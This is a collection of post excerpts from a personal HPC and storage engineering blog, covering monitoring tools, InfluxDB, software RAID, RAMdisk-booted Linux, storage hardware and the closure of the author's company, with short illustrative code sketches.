I’d like to offer an excuse. But I can’t. It was one single missing newline. Just one. Missing. Newline. I changed my config file to use port 10000. I set up an nc listener on the remote host.
    nc -k -l a.b.c.d 10000

Then I invoked the code. And the data showed up. Without a ()&(&%&$%*&(^ newline. That couldn’t possibly be it. Could it? No. It’s way too freaking simple.
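For the curious, here is a minimal sketch of the kind of fix involved. It assumes the listener speaks a line-oriented format like graphite's plaintext protocol (`path value timestamp`, one metric per line); the post does not say exactly what the collector sent, and `format_metric` and `send_metric` are hypothetical names, not functions from the actual monitoring code.

```python
import socket
import time


def format_metric(path, value, timestamp=None):
    """Build one line-oriented metric record (assumed format, see above)."""
    ts = int(time.time()) if timestamp is None else int(timestamp)
    # The trailing "\n" is the whole point: a line-based receiver keeps
    # buffering until it sees the terminator, so without it nothing is parsed.
    return f"{path} {value} {ts}\n".encode("ascii")


def send_metric(sock, path, value, timestamp=None):
    """Send a single newline-terminated metric over a connected socket."""
    sock.sendall(format_metric(path, value, timestamp))


if __name__ == "__main__":
    # Loopback demonstration with a socket pair instead of a real listener.
    sender, receiver = socket.socketpair()
    send_metric(sender, "host.cpuload.avg1", 0.42, timestamp=1400000000)
    print(receiver.recv(1024))
    sender.close()
    receiver.close()
```

Pointing the same code at an `nc` listener like the one above is a quick way to see whether each record really ends where you think it does.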
Posts
New monitoring tool, and a very subtle bug
I’ve been working on coding up some additional monitoring capability, and had an idea a long time ago for a very general monitoring concept. Nothing terribly original, not quite nagios, but something easier to use/deploy. Finally I decided to work on it today. The monitoring code talks to a graphite backend. Could talk to statsd, or other things. In this case, we are using the InfluxDB plugin for graphite. I wanted an insanely simple local data collector.
Posts
InfluxDB cli is up on github
I know there is a node version, and I did try it before I wrote my own. Actually, the reason I wrote my own was that I tried it and … well … Link is here. And yes, the readme is borked about 1/2 way through. Doesn’t quite show the formatting of the output right. Will try to fix over the weekend, as I move this to a far more feature-complete state.
Posts
Have a nice cli for InfluxDB
I tried the nodejs version and … well … it was horrible. Basic things didn’t work. Made life very annoying. So, being a good engineering type, I wrote my own. It will be up on our site soon. Here’s an example
    ./influxdb-cli.pl --host 192.168.5.117 --user test --pass test --db metrics
    metrics> \list series
    .----------------------------------.
    | series name                      |
    +----------------------------------+
    | lightning.cpuload.avg1           |
    | lightning.cputotals.idle         |
    | lightning.cputotals.irq          |
    | lightning.
Posts
Be on the lookout for 'pauses' in CentOS/RHEL 6.5 on Sandy Bridge
Probably on Ivy Bridge as well. Short version. The pauses that plagued Nehalem and Westmere are baaaack. In RHEL/CentOS 6.5 anyway. A customer just ran into one. We helped diagnose/work around this a few years ago when a hedge fund customer ran into this … then a post-production shop … then … Basically the problem came in from the C-states. The deeper the sleep state, in some instances, the processor would not come out of it, or get stuck in the lower levels.
Posts
Doing what we are passionate about
I am lucky. I fully admit this. There are people out there who will tell you that it’s pure skill that they have been in business and been successful for a long time. Others will admit luck is part of it, but will again, pat themselves on the back for their intestinal fortitude. Few will say “I am lucky”. Which is a shame, as luck, timing (which you can never really, truly, control), and any number of other factors really are critical to one being able to have the luxury of doing what we are doing.
Posts
You can tell you are a little nuts if ...
… you get really annoyed at the performance of grep on file IO (seriously folks? 32k or page size sized IO? What is this … 1992?) so you rewrite it in 20 minutes in Perl, and increase the performance by 5-8x or so. If I get angry enough, I might just go all out, use direct IO, multiple parallel readers, and some other bits. I’ve got these huge disk pipes, awesome bandwidths, and this tiny little filter tool.
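The general idea (issue large reads, then split lines in memory) can be sketched as follows. This is not the Perl rewrite from the post; it is a Python illustration, and the function name `grep_big_reads` and the 8 MiB default block size are assumptions chosen for the example. No performance claim is attached to it.

```python
import os
import re
import tempfile


def grep_big_reads(path, pattern, block_size=8 * 1024 * 1024):
    """Return lines (as bytes) matching `pattern`, reading in large blocks."""
    regex = re.compile(pattern)
    matches = []
    carry = b""  # partial line left over from the previous block
    # buffering=0 gives raw reads, so block_size is the actual request size
    with open(path, "rb", buffering=0) as fh:
        while True:
            block = fh.read(block_size)
            if not block:
                break
            lines = (carry + block).split(b"\n")
            carry = lines.pop()  # last piece may be an incomplete line
            matches.extend(line for line in lines if regex.search(line))
    if carry and regex.search(carry):
        matches.append(carry)  # final line without a trailing newline
    return matches


if __name__ == "__main__":
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(b"alpha\nbeta error\ngamma\nerror at end")
    try:
        # A tiny block size forces lines to straddle block boundaries.
        for line in grep_big_reads(tmp.name, rb"error", block_size=4):
            print(line.decode())
    finally:
        os.unlink(tmp.name)
```

The only subtle part is the `carry` buffer: a line that straddles two blocks has to be stitched back together before matching.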
Posts
how not to write driver Makefiles or configuration scripts
    if [uname -r eq ...]

It’s very bad form to insist on very particular versions of an OS/kernel. Not only will you piss off your customer (me), you will cause a great deal of effort to unwind the ill-considered test in order to get even basic functionality. I’ve seen this on network cards, RAID cards, you name it. It increases your support load, decreases the likelihood that you can actually support what’s out there … say for example, someone does a ‘yum update’ and gets an updated kernel.
Posts
Update on IPMI Console Logger
Config now comes from some nice and simple json, and it handles multiple machines with aplomb. See the git repository for the latest. The config file example is in there, and you can replicate the n01-ipmi section with more nodes trivially. Coming next is getting config from a trusted web server, along with registering the client to the trusted web server. This prevents things like passwords from showing up in the clear, though you can always create a lower privileged user to access the console for monitoring.
Posts
Playing with AVX
I finally took some time from a busy schedule to play with AVX. I took my trusty old rzf code (Riemann Zeta function) and rewrote the time-expensive inner loop in AVX primitives hooked to my C code. As a reminder, this code is a very simple sum reduction, and can be trivially parallelized. Vectorization isn’t as straightforward, and I found that compiler auto-vectorization doesn’t work well for it.
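To show why a sum reduction like this parallelizes so easily, here is a small Python sketch (not the rzf C/AVX code, which the post does not reproduce). The series is split into independent chunks, each chunk produces a partial sum, and the partials are combined at the end. The names `zeta_partial` and `zeta_chunked` are made up for illustration.

```python
import math


def zeta_partial(s, start, stop):
    """Sum k**-s for k in [start, stop), adding the smallest terms first."""
    total = 0.0
    for k in range(stop - 1, start - 1, -1):
        total += k ** -s
    return total


def zeta_chunked(s, n_terms, n_chunks):
    """Approximate zeta(s) from n_terms terms split into n_chunks partial sums."""
    # Chunk boundaries over k = 1 .. n_terms; each chunk is independent,
    # so each could be handed to a separate thread, process, or SIMD lane.
    bounds = [1 + (n_terms * i) // n_chunks for i in range(n_chunks + 1)]
    partials = [
        zeta_partial(s, bounds[i], bounds[i + 1]) for i in range(n_chunks)
    ]
    return math.fsum(partials)


if __name__ == "__main__":
    approx = zeta_chunked(2, 1_000_000, 8)
    print(approx, math.pi ** 2 / 6)
```

Vectorizing the inner loop is a different matter from splitting the outer range, which is the distinction the post draws.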
Posts
started playing with SmartOS for the day job
This is a very cool concept, something that meshes perfectly with our Tiburon based siCluster philosophy. That is, compute nodes should boot diskless, there should be very little state on each node, and stuff that you need to do should be made absolutely as simple as possible. SmartOS is a project of Joyent. Joyent, for those not familiar with them, are a cloud company, building a nice public cloud for end users to build on.
Posts
Fun with primes
A long time ago, in a galaxy far … far … away … I’ve been playing with primes for a while … computing them, etc. Have a neat way to represent any natural number (excluding 0) in terms of the exponents of its prime factors. Lots of reasons for playing with this. Started doing this before joining SGI … many moons ago, and used it as a way to entertain myself on airplanes when the laptop battery ran out.
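A rough sketch of one such representation, assuming plain trial division and a dictionary of prime to exponent (the post does not say how the original code stored it, and the function names here are hypothetical):

```python
def prime_exponents(n):
    """Map each prime factor of n (n >= 1) to its exponent; 1 maps to {}."""
    if n < 1:
        raise ValueError("n must be a natural number >= 1")
    exps = {}
    p = 2
    while p * p <= n:
        while n % p == 0:
            exps[p] = exps.get(p, 0) + 1
            n //= p
        p += 1
    if n > 1:  # whatever remains is itself prime
        exps[n] = exps.get(n, 0) + 1
    return exps


def from_exponents(exps):
    """Rebuild the natural number from its prime-exponent map."""
    result = 1
    for p, e in exps.items():
        result *= p ** e
    return result


def multiply(a, b):
    """Multiply two numbers in exponent form by adding exponents."""
    out = dict(a)
    for p, e in b.items():
        out[p] = out.get(p, 0) + e
    return out


if __name__ == "__main__":
    print(prime_exponents(360))  # 360 = 2^3 * 3^2 * 5
    print(from_exponents(multiply(prime_exponents(12), prime_exponents(18))))
```

One nice property of this form is that multiplication turns into addition of exponents, which is what `multiply` does.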
Posts
I know I shouldn't be ... but I am ...
[update] a bug in my reasoning (thanks Peter!)

a Perl Golf addict. Not a recovering addict, but one that is active. What is Perl Golf? Well, as in real golf, you try to provide the minimal number of steps to a solution. In this case, you are to solve the specific puzzle. Detractors of Perl often make snarky comments about Perl’s equivalency to random line noise and other such nonsense. Sure … if it makes you feel good to say that … I am a fan of terse languages, I wrote programs (if you could call them that) in APL … a while ago.
Posts
Guide to getting OFED 1.2 to build on OpenSuSE
Grab the tarball from the open fabrics alliance (or from here)
Grab the build_new.sh from here, place it in the OFED-1.2 directory

as root on your machine

    mv /usr/src/linux-2.6.18.2-34/include/linux/miscdevice.h /usr/src/linux-2.6.18.2-34/include/linux/miscdevice.h.original
    ln -s /usr/include/linux/miscdevice.h /usr/src/linux-2.6.18.2-34/include/linux/miscdevice.h

Then run the build_new.sh. Voila. Works. Binary RPMs are here.
Posts
Is OpenSolaris Open?
As seen on /. IBM is questioning whether or not it is really open.
I think the real question is, does it matter? I really don’t see a need for it. The market is positively crowded with OpenSource Linux, *BSD. OpenSource should not be a repository for declining projects. From an ISV perspective, you have to ask “why”? Precisely what benefit in terms of lower costs and increased revenue does being on Solaris bring?
Posts
New programming workshop: Perl and R for Informatics
The good folks over at BioInformatics.org have a new workshop ready to go on programming in Perl and R. See this link for more details. If there is interest in having this outside of Boston, please let me know.
Posts
The marketing of computer languages
I have noticed a tendency for technologists, programmers, and others to fall in love with their projects, their tools, … . Why this happens, I am not sure. I don’t love my hammer, my circular saw, my computers, the languages I use. They are tools. They are the means to a goal. Sure, I like some tools more than others, but I am also not going to waste my time misusing a tool for a purpose ill suited for it.
Category: storage
Posts
Wordpress is recovering (was very sick)
Please note: Wordpress appears to be failing badly at this stage. I’ll be working on a fix this week, and likely will create a new site out of different, less buggy code. I’ve checked the DB, moved it to a different machine, restored from a known working backup. It appears a recent update of WP managed to completely screw up post handling. I disabled all plugins, ran health checks, etc. I’ve cleaned cookies, browsing history, used different browsers on different machines, with exactly the same outcome.
Posts
How to handle curious conversations ... part 1 of a few billion
So … Suppose someone comes up to you and makes a claim. This claim isn’t backed by facts, merely by unicorns, rainbows, and their own biases. Yeah, this kind of relates to the previous post. They argue based upon the claim. Stake out their ground. Insist that “none shall pass” in a black knight, Monty Python-esque manner. But they are wrong. Simply, factually wrong. Regardless of their biases, you and many others have been demonstrating the very thing that is claimed to be impossible, to customers for years.
Posts
Distribution package dependency radii, or why distros may be doomed
I am a sucker for a good editor. I like atom. Don’t yell at me. It’s pretty good for my use cases. It has lots of nice extensions I can and have used. Atom is not without its dependencies though. Installing it, which should be relatively simple, turns out to be … well … interesting.
    [root@centos7build nyble]# rpm -ivh ~/atom.x86_64.rpm
    error: Failed dependencies:
        libXss.so.1()(64bit) is needed by atom-1.26.0-0.1.x86_64

In searching the interwebs for what Xss is, I happened across this little tidbit
Posts
NyBLE
So there I am updating my new repository to enable using zfs in the ramboot images. This is a simplification and continuation of the previous work I did a few years ago, with some massive code cleanups. And sadly, no documentation yet. Will fix soon, but for now, I am trying to hit the major functionality points. NyBLE is a linux environment for hypervisor hosts. It builds on the old open source SIOS work, and extends it in significant ways.
Posts
Dealing with disappointment
In the last few years, I’ve had major disappointments professionally. The collapse of Scalable, some of the positively ridiculous things associated with the aftermath of that, none of which I’ve written about until they are over. Almost over, but not quite. Waiting for confirmation. My job search last year, and some of the disappointment associated with that. Recently I’ve had different types of disappointments, without getting into details. The way I’ve dealt with these things in the past has been to try to understand if there was a conflict, what could I have done better.
Posts
Late Feb 2018 update
Again, many apologies over the low posting frequency. Several things that are nearing completion (hopefully soon) that I want finalized first. That said, the major news is that this site is now on a much improved server and network. I’ve switched from Comcast Business to WOW business. So far, much better speed, more consistent performance, far lower cost per bandwidth. I do have lots to write about, and have been saving things up until after this particular objective is met, so I can work/write distraction free.
Posts
Apologies on the slow posting rate
Many things are going on simultaneously right now, and I have little time to compose thoughts for the blog. I anticipate a bit of a letup in the next week or two as the year comes to a close.
Posts
Cool bug on upgrade (not)
Wordpress is an interesting beast. Spent hours working through issues that I shouldn’t have needed to on an upgrade, as some functions were deprecated. In an interesting way. By removing them, and throwing an error. Which I found only through looking at a specific log. So out goes that plugin. And the site is back.
Posts
#SC17
I’ve had numerous requests from friends and colleagues about whether I will be attending #SC17 this year. Sadly, this is not to be the case. $dayjob has me attending an onsite meeting that week in San Francisco, and the schedule was such that I could not attend the talks I was interested in. I’d love for there to be a way to listen to the talks remotely. Maybe I’ll simply buy the DVD/USB stick of the talks if there is an online store for them.
Posts
A completed project: mysqldump file to CSV converter
This was part of something else I’d worked on, but it never saw the light of day for a number of (rather silly) reasons. So rather than let these bits go to waste, I created a github repo for posterity. Someone might be able to make effective use of them somewhere. Repo is located here: https://github.com/joelandman/msd2csv Pretty simple code, does most of the work in-memory, and multiple regex passes to transform and clean up the CSV.
Posts
Cray "acquires" ClusterStor business unit from Seagate
Information at this link. It is being called a “strategic transaction”, though it likely came about as a result of Seagate doing some profound and deep thinking over what business it was in. Seagate has been weathering a storm, and has been working on re-orgs to deal with a declining disk market. They acquired ClusterStor as part of a preceding transaction of Xyratex. Xyratex was the basis for the Cray storage platforms (post Engenio).
Posts
The birthday problem (allocation collisions) for networks and MAC addresses
The birthday problem is a fairly simple situation to state. There is at least a 50% probability (i.e. an even chance) that at least 2 of 23 randomly chosen people in a room have the same birthday. This comes from some elementary applications of statistics, and is documented on Wikipedia. While we care less about networks celebrating their annual journey around Sol, we care more about potential address collisions for statically assigned IP addresses.
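The same arithmetic carries over from birthdays to address pools. A minimal sketch, assuming addresses are picked uniformly at random from a pool of `d` slots (the function names and the pool-size parameter are mine, purely for illustration):

```python
def collision_probability(n, d):
    """Probability that at least two of n uniform random picks from d slots collide."""
    if n > d:
        return 1.0  # pigeonhole: more picks than slots guarantees a collision
    p_unique = 1.0
    for i in range(n):
        # The (i+1)-th pick must avoid the i slots already taken.
        p_unique *= (d - i) / d
    return 1.0 - p_unique


def smallest_group_for(p_target, d):
    """Smallest n for which the collision probability reaches p_target."""
    n = 0
    p_unique = 1.0
    while 1.0 - p_unique < p_target:
        p_unique *= (d - n) / d
        n += 1
    return n


if __name__ == "__main__":
    # The classic case: 365 possible birthdays, even odds of a shared one.
    print(smallest_group_for(0.5, 365))
    print(round(collision_probability(23, 365), 4))
```

Swap 365 for the number of assignable addresses in a subnet and the same functions give the odds of two hosts landing on the same address.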
Posts
Now for your bidding pleasure, the contents of one company
This is an on-going process I won’t comment on, other than to provide a link to the bidding site. There are numerous cool items in there.
* Lot 2-57207: a 64 bay siFlash/Cadence machine with 64x 400GB SAS SSDs. Fully operational, SSDs very lightly used, extraordinarily fast unit.
* Lot 2-57215: 2 mac minis (one was my desktop unit)
* Lot 2-57216: My old Macbook pro, 750 GB SSD, 16 GB ram, NVidia gfx
* Lot 2-57081: Mac pro tower unit
* Lot 2-57232: a bunch of awesome monitors
* Lot 2-57222: Mini 24U rack with PDUs
* Lot 2-57015: Supermicro Twin 2U system (5 others just like it)
* Lot 2-57100: a 40 core 256GB testbed machine

And many other computer systems, parts, etc.
Posts
One door has closed, another has opened
As I had written previously, my old company, Scalable Informatics, has closed. Read that posting to see why and how, but as with all things … we must move forward. It is cliché to use the title phrase. But it is also true. We know the door that closed. It’s the door that has opened afterwards that I am focusing upon. I have joined Joyent to work on, as it turns out, many similar things to what I did at Scalable.
Posts
Hard disk shipments dropped 10% QoQ, 2% YoY
This jibes very well with what I’ve observed. Decreasing demand for enterprise storage hard disks, or as I call them “Spinning Rust Drives” (or SRD) as compared with SSD (Solid State Drives). The summary is here with a key quote being
Again, jibes well with what I’ve observed. Mellanox has a good take on its blog, noting that
This is a critical point. While SRD are dropping in volume, there is not enough SSD fab capacity to supply the market demand.
Posts
I always love these breathless stories of great speed, and how VCs love them ...
Though, when I look at the “great speed”, it is often on par with or less than Scalable Informatics sustained years before. From 2013 SC13 show, on the show floor, after blasting through a POC at unheard of speed, and setting long standing records in the STAC-M3 benchmarks …
Article in question is in the Register. Some of the speeds and feeds:
* 200 microsecs latency
* 45GBps read bandwidth
* 15GBps write bandwidth
* 7 million IOPS

But then … a fibre connection.
Posts
Requiem
This is the post an entrepreneur hopes to never write. They pour their energy, their time, their resources, their love into their baby. Trying to make her live, trying to make her grow. And for a while, she seems to. Everything is hitting the right way, 12+ years of uninterrupted growth and profitable operation as an entirely bootstrapped company. Market leading … no … dominating … from the metrics customers tell you are important … position.
Posts
Best comment I've seen in a bug report about a tool
So … gnome-terminal has been my standard cli interface on linux GUIs for a while. I can’t bring myself to use KDE for any number of reasons. Gnome itself went in strange directions, so I’ve been using Cinnamon atop Mint and Debian 8. Ok, Debian 8. Gnome-terminal. Some things missing when you right mouse button click. Like “open new tab”. Open new window is there. This works. But no tab entry.
Posts
structure by indentation ... grrrr ....
If you have to do this:
:%s/\t/ /g

in order to get a very simple function to compile because of this error

File "./snd.py", line 13
    return sum
             ^
IndentationError: unindent does not match any outer indentation level

even though your editor (atom!!!!??!?!) wasn’t showing you these mixed tabs and spaces … Yeah, there is something profoundly wrong with the approach. The function in question was all of 10 lines.
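When the editor won't show the tabs, a few lines of script will. This is a minimal sketch (the function name is hypothetical, not something from the original post) that reports which lines carry a tab anywhere in their leading whitespace, so you can see the damage before running a blanket substitution:

```python
import sys


def find_tab_indented_lines(source):
    """Return 1-based line numbers whose leading whitespace contains a tab."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        # Slice off everything from the first non-space, non-tab character on.
        indent = line[: len(line) - len(line.lstrip(" \t"))]
        if "\t" in indent:
            hits.append(lineno)
    return hits


if __name__ == "__main__" and len(sys.argv) > 1:
    # Usage: python find_tabs.py snd.py
    with open(sys.argv[1]) as handle:
        for lineno in find_tab_indented_lines(handle.read()):
            print(f"{sys.argv[1]}:{lineno}: tab in indentation")
```

It only looks at indentation, so tabs inside string literals are left alone.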
Posts
What is old, is new again
Way back in the pre-history of the internet (really DARPA-net/BITNET days), while dinosaur programming languages frolicked freely on servers with “modern” programming systems and data sets, there was a push to go from statically linking programs to more modular dynamic linking. The thinking was that it would save precious memory, by not having many copies of libc statically linked into binaries. It would reduce file sizes, as most of your code would be in libraries.
Posts
Another article about the supply crisis hitting #SSD, #flash, #NVMe, #HPC #storage in general
I’ve been trying to help Scalable Informatics customers understand these market realities for a while. Unfortunately, to my discredit, I’ve not been very successful at doing so … and many groups seem to assume supply is plentiful and cheap across all storage modalities. Not true. And not likely true for at least the rest of the year, if not longer. This article goes into some depth that I’ve tried to explain to others in phone conversations, private email threads.
Posts
A nice shout out in ComputerWeekly.com about @scalableinfo #HPC #storage
See the article here.
They mention Axellio, and on The Reg article on their ISE product, they say “X-IO partners using Axellio will be able to compete with DSSD, Mangstor and Zstor and offer what EMC has characterised as face-melting performance.” Hey, we were the first to come up with “face melting performance”. More than a year ago. And it really wasn’t us, but my buddy Dr. James Cuff of Harvard.
Posts
when you eliminate the impossible, what is left, no matter how improbable, is likely the answer
This is a fun one. A customer has quite a collection of all-flash Unison units. A while ago, they asked us to turn on LLDP support for the units. It has some value for a number of scenarios. Later, they asked us to turn it off. So we removed the daemon. Unison ceased generating/consuming LLDP packets. Or so we thought. Fast forward to last week. We are being told that LLDP PDUs are being generated by the kit.
Posts
Virtualized infrastructure, with VM storage on software RAID + a rebuild == occasional VM pauses
Not what I was hoping for. I may explain more of what I am doing later (less interesting than why I am doing it), but suffice it to say that I’ve got a machine I’ve turned into a VM/container box, so I can build something I need to build. This box has a large RAID6 for storage. Spinning disk. Fairly well optimized, I get good performance out of it. The box has ample CPU, and ample memory.
Posts
There are real, and subtle differences between su and sudo
Most of the time, sudo just works. Every now and then, it doesn’t. Most recently was with a build I am working on, where I got a “permission denied” error for creating a directory. The reason for this was non-obvious at first. You “are” superuser after all when you sudo, right? Aren’t you? Sort of. Your effective user ID has been set to the superuser. Your real user ID still is yours.
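A quick way to check which identity a process actually carries is to ask the OS for both the real and the effective IDs. A minimal sketch for Unix-like systems (the function name is hypothetical); what it reports under sudo depends on how sudo is configured on your box, so run it both ways rather than assuming:

```python
import os


def identity_report():
    """Collect the real and effective user/group IDs of the current process."""
    return {
        "real_uid": os.getuid(),
        "effective_uid": os.geteuid(),
        "real_gid": os.getgid(),
        "effective_gid": os.getegid(),
    }


if __name__ == "__main__":
    # Compare the output of: python ids.py, sudo python ids.py, and su -c "python ids.py"
    for name, value in identity_report().items():
        print(f"{name}: {value}")
```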
Posts
Combine these things, and get a very difficult to understand customer service
In the process of disconnecting a service we don’t need anymore. So I call their number. Obviously reroutes to a remote call center. One where English is not the primary language. I’m ok with this, but the person has a very thick and hard to understand accent. Their usage and idiom were not American, or British English. This also complicates matters somewhat, but I am used to it. I can infer where they were from, from their usage.
Posts
A new (old) customer for the day job
Our friends at MSU HPCC now are the proud owners of a very fast/high performance Unison Flash storage system, and a ZFS backed high performance Unison storage spinning disk unit. Installed first week of Jan 2017. As MSU is one of my alma mater institutions, I am quite happy about helping them out with this kit. They’ve been a customer previously; they had bought some HPC MPI/OpenMP programming training in the dim and distant past.
Posts
Architecture matters, and yes Virginia, there are no silver bullets for performance
Time and time again, the day job had been asked to discuss how the solutions are differentiated. Time and time again, we showed benchmarks on real workloads that show significant performance deltas. Not 2 or 3 sigma measurements. More often than not, 2x -> 10x better. Yet … yet … we were asked, again and again, how we did it. We pointed to our architecture. But, they complained, isn’t it the same as X (insert your favorite volume vendor here)?
Posts
Another itch scratched
So there you are, with many software RAIDs. You’ve been building and rebuilding them. And somewhere along the line, you lost track of which devices were which. So somehow you didn’t clean up the last build right, and you thought you had a hot spare … until you looked at /proc/mdstat … and said … Oh … So. I wanted to do the detailed accounting, in a simple way. I want the tool to tell me if I am missing a physical drive (e.
Posts
fortran for webapps
Use Fortran for your MVC web app. No, really … Here you are, coding your new density functional theory app, and you want to give it a nice shiny new web framework front end. Config files are so … 80s … Like in grad school, man … You want shiny new MVC action, with the goodness of fortran mixed in. Out comes Fortran.io.
Posts
She's dead Jim
It looks like (if the rumor is true) Solaris will be pushing up the daisies soon. Note: Solaris != SmartOS. This has been a long time coming. Combine this with Fujitsu dumping SPARC for headline projects … yeah … it’s likely over. FWIW: I like SmartOS. The issue for it is drivers. We tried helping, and were able to get one group to update their driver set. But getting others to update (specifically Mellanox) will be even harder now (and it was impossible beforehand, for reasons that were not Mellanox’s fault).
Posts
Inventory reduction event at the day job
We’ve got 3x Unison (https://scalableinformatics.com/unison) and 1x cadence (https://scalableinformatics.com/cadence) system that we need to clear out. The Unison machines are 5-7GB/s each, and the Cadence is 10-20GB/s and 200-600k IOPs (depending upon storage configuration). More info by emailing me. Everything is on a first come, first served basis, feel free to reach out if you’d like to hear more.

Specs:

ucp-01: Unison1
* 12 core, 128GB ram
* 2x40GbE or 4x10GbE ports
* 60x 2TB drives
* 4x 800GB SSD

ucp-04: Unison2
* 12 core, 128GB ram
* 2x40GbE or 4x10GbE ports
* 60x 2TB drives
* 4x 800GB SSD

usn-03: Cadence1
* 12 core, 128GB ram
* 2x40GbE or 4x10GbE ports
* 48x 400GB SATA SSD

One more unlisted Unison unit with the same specs as the others, though with 3TB drives.
Posts
It's 2016, almost 2017 ... fix your application installer so it doesn't need to reboot my machine!
There I was running my windows in a window on my desktop. Running a nice little word processor from a company in Redmond, WA. Working on a document. About 15 minutes in, and I usually save at 30 minute boundaries … because … hey … they haven’t quite figured out that the word processor should do this for you … AUTOMATICALLY … Ok, I am shouting. Calm down. Anyway, for some reason, some little Cupertino company’s code pops up and says “hey, you wanna update me?
Posts
Watching a low level attack in process
I won’t say where, but it is fascinating watching what is being tried. I won’t divulge details of any sort (asymmetric information works to my advantage here).
Posts
On expectations
This has happened multiple times over the last few months. Just variations on the theme as it were, so I’ll talk about the theme. The day job builds some of the fastest systems for storage and analytics on the market. We pride ourselves on being able to make things go very … very fast. If it’s slow, IMO, it’s a bug. So we often get people contacting us with their requirements. These requirements are often very hard for our competitors, and fairly simple for us to address.
Posts
The joy of IE and URLs, or how to fix ridiculous parsing errors on the part of some "helpers"
Short version. Day job sending some marketing out. URLs are pretty clear cut. Tested well. But some clients seem to have mis-parsed the url. Like with a trailing “)”. For some reason. That I don’t quite grok. I tried a few ways of fixing it. Yes, I know, because I fixed it, I baked it into the spec. /sigh First was a regex rewrite rule. Turns out the rewrite didn’t quite work the way it was intended, and it killed the requests.
Posts
Build me a big data analysis room
This was the request that showed up on our doorstep. A room. Not a system. But a room. Visions of the Star Trek NG bridge came to mind. Then the old SGI power wall … 7 meters wide by 2 meters high, driven by an awesomely powerful Onyx system (now underpowered compared to a good Nvidia card). Of course, the budget wouldn’t allow any of these, but it was still a cool request.
Posts
Running conditioning on 4x Forte #HPC #NVMe #storage units
This is our conditioning pass to get the units to stable state for block allocations. We run a number of fill passes over the units. Each pass takes around 42 minutes for the denser units, 21 minutes for the less dense ones. After a few passes, we hit a nice equilibrium, and performance is more deterministic, and less likely to drop as block allocations gradually fill the unit. We run the conditioning over the complete device, one conditioning process per storage device, with multiple iterations of the passes.
Posts
Amazing statistics
In the last year, this has been what this blog has seen for visitors/viewers and page views.

* 188,654 (unique) visitors
* 2,572,665 page views

I am … humbled …
Posts
Aquila launches Aquarius
Story is here, at the always excellent InsideHPC site. Scroll the linked page on Aquarius to see some of their tech and their partners … Congrats guys! Great job!
Posts
New #HPC #storage configs for #bigdata , up to 16PB at 160GB/s
This is an update to Scalable Informatics’ “portable petabyte” offering. Basically, from 1 to 16PB of usable space, distributed and mirrored metadata, high performance (100Gb) network fabric, we’ve got a very dense, very fast system available now, at a very aggressive price point (starting configs around $0.20/GB). Batteries included … long on features, functionality, performance. Short on cost. We are leveraging the denser spinning rust drives (SRD), as well as a number of storage technologies that we’ve built or integrated into the systems.
Posts
Fully RAMdisk booted CentOS 7.2 based SIOS image for #HPC , #bigdata , #storage etc.
This is something we’ve been working on for a while … a completely clean, as baseline a distro as possible, version of our SIOS RAMdisk image using CentOS (and by extension, Red Hat … just need to point to those repositories). And it’s available to pull down and use as you wish from our download site. Ok, so what does it do? Simple. It boots an entire OS, into RAM. No disks to manage and worry over.
Posts
An article on Python vs Julia for scripting
For those who don’t know, Julia is a very powerful new language, which aims to leverage a JIT compilation mechanism to generate very fast numerical/computational code in general from a well thought out language. I’ve argued for a while that it feels like a better Python than Python. Python, for those who aren’t aware, is a scripting language which has risen in popularity over recent years. It is generally fairly easy to work in, with a few caveats.
Posts
M&A time: HPE buys SGI, mostly for the big data analytics appliances
I do expect more consolidation in this space. There aren’t many players doing what SGI (and the day job) does. The story is here. The interesting thing about this is, that this is in the high performance data analytics appliance space. As they write:
12-16% CAGR for data analytics, which I think is low … . And the point they make about the data explosion is exactly what we talk about as well.
Posts
Raw Unapologetic Firepower: kdb+ from @Kx
While the day job builds (hyperconverged) appliances for big data analytics and storage, our partners build the tools that enable users to work easily with astounding quantities of data, and do so very rapidly, and without a great deal of code. I’ve always been amazed at the raw power in this tool. Think of a concise functional/vector language, coupled tightly to a SQL database. It’s not quite an exact description; have a look at Kx’s website for a more accurate one.
Posts
About that cloud "security"
Wow … might want to rethink what you do and how you do it. See here. Put in simple terms, why bother to encrypt if your key is (trivially) recoverable? I did not realize that side channel attacks were so effective. Will read the paper. If this isn’t just a highly over specialized case, and is actually applicable to real world scenarios, we’ll need to make sure we understand methods to mitigate.
Posts
Ah Gmail ... losing more emails
So … my wife and I have private gmail addresses. Not related to the day job. She sends me an email from there. It never arrives. Gmail to gmail. Not in the spam folder. But to gmail. So I have her send it to this machine. Gets here right away. We moved the day job’s support email address off gmail (it’s just a reflector now) into the same tech running inside our FW.
Posts
Real scalability is hard, aka there are no silver bullets
I talked about hypothetical silver bullets in the recent past at a conference and to customers and VCs. Basically, there is no such thing as a silver bullet … no magic pixie dust, or magical card, or superfantastic software you can add to a system to make it incredibly faster. Faster, better performing systems require better architecture (physical, algorithmic, etc.). You really cannot hope to throw a metric-ton of machines at a problem and hope that scaling is simple and linear.
Posts
Having to do this in a kernel build is simply annoying
So there are some macros, __DATE__ and __TIME__, that the gcc compiler knows about. And some people inject these into their kernel module builds, because, well, why not. The issue is that they can make “reproducible builds” harder. Well, no, they really don’t. That’s a side issue. And of course, modern kernel builds use -Wall -Werror which converts warnings like macro "__TIME__" might prevent reproducible builds [-Werror=date-time] into real honest-to-goodness errors.
Posts
Going to #KXcon2016 this weekend to talk #NVMe #HPC #Storage for #kdb #iot and #BigData
This should be fun! This is being organized and run by my friend Lara of Xand Marketing. Excellent talks scheduled, fun bits (raspberry pi based kdb+!!!). Some similarities with the talk I gave this morning, but more of a focus on specific analytics issues relevant for people with massive time series data sets and a need to analyze them. Looking forward to getting out to Montauk … haven’t been there since I did my undergrad at Stony Brook.
Posts
Gave a talk today at #BeeGFS User Meeting 2016 in Germany on #NVMe #HPC #Storage
… through the magic of Google Hangouts. I think they will be posting the talk soon, but you are welcome to view the PDF here.
Posts
Success with rambooted Lustre v2.8.53 for #HPC #storage
[root@usn-ramboot ~]# uname -r
3.10.0-327.13.1.el7_lustre.x86_64
[root@usn-ramboot ~]# df -h /
Filesystem      Size  Used Avail Use% Mounted on
tmpfs           8.0G  4.3G  3.8G  53% /
[root@usn-ramboot ~]#
[root@usn-ramboot ~]# rpm -qa | grep lustre
kernel-3.10.0-327.13.1.el7_lustre.x86_64
kernel-tools-3.10.0-327.13.1.el7_lustre.x86_64
kernel-devel-3.10.0-327.13.1.el7_lustre.x86_64
lustre-2.8.53_1_g34dada1-3.10.0_327.13.1.el7_lustre.x86_64.x86_64
